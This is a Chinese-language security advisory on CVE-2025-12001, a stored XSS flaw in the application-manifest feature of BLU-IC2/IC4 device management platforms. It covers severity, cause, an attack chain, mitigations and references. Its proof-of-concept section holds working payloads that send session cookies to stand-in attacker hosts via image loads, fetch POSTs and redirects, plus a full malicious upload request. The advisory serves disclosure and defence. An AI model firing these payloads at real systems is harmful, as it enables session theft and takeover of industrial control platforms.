CVE-2025-12001 BLU-IC2/IC4 应用程序清单存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12001

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

BLU-IC2 和 BLU-IC4

漏洞概述

CVE-2025-12001 是存在于 BLU-IC2 和 BLU-IC4 设备管理平台中的存储型跨站脚本（Stored XSS）漏洞。该漏洞的根本原因在于应用程序对用户上传的清单文件（application manifest）缺乏充分的输入清理与过滤机制。攻击者可以将恶意构造的 JavaScript 代码或 HTML 注入到清单文件中，当其他用户或管理员在平台中查看该清单时，恶意脚本将在受害者浏览器中自动执行，从而实现会话劫持、敏感信息窃取、权限提升或进一步的攻击活动。该漏洞的 CVSS 3.1 评分为 6.1，属于中危级别。攻击者无需认证即可通过网络发起攻击，但需要受害者进行交互（如查看被注入恶意代码的清单页面）。该漏洞影响 BLU-IC2 和 BLU-IC4 1.19.5 及之前的所有版本，建议用户尽快升级到修复版本以消除安全风险。BLU-IC 系列设备广泛应用于工业控制和楼宇自动化领域，因此该漏洞可能对相关行业的运营安全构成潜在威胁。

技术细节

该漏洞源于 BLU-IC2/BLU-IC4 平台在处理应用程序清单（application manifest）时未对用户输入进行充分的消毒和验证。具体而言，当用户上传或编辑应用程序清单时，清单中的字段（如名称、描述、URL、配置参数等）被直接存储到数据库中而未进行 HTML 实体编码或恶意脚本过滤。当其他用户通过 Web 界面查看该清单时，服务器将未经处理的用户输入直接嵌入到 HTML 响应中返回给浏览器，导致恶意 JavaScript 代码在受害者浏览器上下文中执行。

利用方式如下：
1. 攻击者通过合法途径上传包含恶意脚本的应用程序清单，例如在清单名称或描述字段中注入 `<script>alert(document.cookie)</script>` 或 `<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>` 等载荷；
2. 恶意清单被存储到后端数据库中；
3. 当管理员或其他授权用户通过 Web 界面浏览该清单时，浏览器解析并执行嵌入的恶意脚本；
4. 攻击者可以利用此漏洞窃取用户会话 Cookie、CSRF Token，或执行未授权操作（如创建管理员账户、修改设备配置等）；
5. 由于该漏洞影响范围为 Changed (S:C)，恶意脚本可能影响多个页面和功能组件。

修复建议：对所有用户可控的清单字段实施严格的输入验证和输出编码，使用白名单过滤策略，并在渲染前对 HTML 特殊字符进行实体编码。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统为 BLU-IC2 或 BLU-IC4 设备管理平台，版本低于或等于 1.19.5，并通过公开渠道或注册账号获取对平台的合法访问权限。

STEP 2

步骤2：构造恶意清单

攻击者精心构造包含恶意 JavaScript 代码的应用程序清单（application manifest），将 XSS 载荷嵌入到清单的名称、描述或其他可编辑字段中。

STEP 3

步骤3：上传恶意清单

攻击者通过平台提供的 API 或 Web 界面上传恶意清单。由于服务端未对输入进行充分的消毒和过滤，恶意载荷被原样存储到后端数据库中。

STEP 4

步骤4：触发存储型XSS

当管理员或其他用户通过 Web 界面浏览包含恶意清单的页面时，服务器将未经处理的恶意载荷直接嵌入 HTML 响应返回给浏览器。

STEP 5

步骤5：恶意脚本执行

浏览器解析并执行嵌入的恶意 JavaScript 代码，攻击者可以在受害者权限上下文中窃取会话 Cookie、CSRF Token，或执行其他未授权操作。

STEP 6

步骤6：权限提升与持久化

利用窃取的管理员会话，攻击者可以创建后门账户、修改设备配置、植入持久化访问机制，进一步扩大攻击影响范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-12001 - BLU-IC2/BLU-IC4 Stored XSS via Application Manifest -->
<!-- This PoC demonstrates how a malicious application manifest can inject scripts -->

<!-- Malicious manifest payload injected into the application name field -->
<script>
  // Steal session cookies and send to attacker server
  var img = new Image();
  img.src = 'https://attacker.example.com/steal?cookie=' + encodeURIComponent(document.cookie);
</script>

<!-- Alternative payload using img onerror event handler -->
<img src="x" onerror="fetch('https://attacker.example.com/exfil', {method:'POST', body:JSON.stringify({cookies:document.cookie, url:location.href})})">

<!-- Example of malicious application manifest JSON payload -->
{
  "application_name": "<script>alert('XSS-CVE-2025-12001')</script>",
  "description": "<img src=x onerror=alert(document.domain)>",
  "version": "1.0.0",
  "author": "<svg onload=alert(1)>",
  "url": "javascript:alert('XSS')"
}

<!-- HTTP request example to upload malicious manifest -->
POST /api/v1/applications/manifest HTTP/1.1
Host: target-blu-ic2.example.com
Content-Type: application/json
Cookie: session=<valid_session_cookie>

{
  "name": "Legit App<script>document.location='https://attacker.com/?c='+document.cookie</script>",
  "description": "Normal description with <script>alert('stored-xss')</script> payload",
  "config": {}
}

影响范围

BLU-IC2 <= 1.19.5

BLU-IC4 <= 1.19.5

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）对管理界面实施网络访问控制，限制仅可信 IP 地址可访问；2）部署 Web 应用防火墙（WAF）规则，检测并阻止包含常见 XSS 载荷的请求；3）定期审查已上传的应用程序清单，删除可疑内容；4）强制要求管理员定期更换会话令牌，降低会话劫持风险；5）启用浏览器的内容安全策略（CSP），限制内联脚本执行；6）监控异常的网络请求和未授权的管理操作。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12001
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12001
3 Details https://www.cvedetails.com/cve/CVE-2025-12001/
4 VulDB https://vuldb.com/cve/CVE-2025-12001
5 Link https://azure-access.com/security-advisories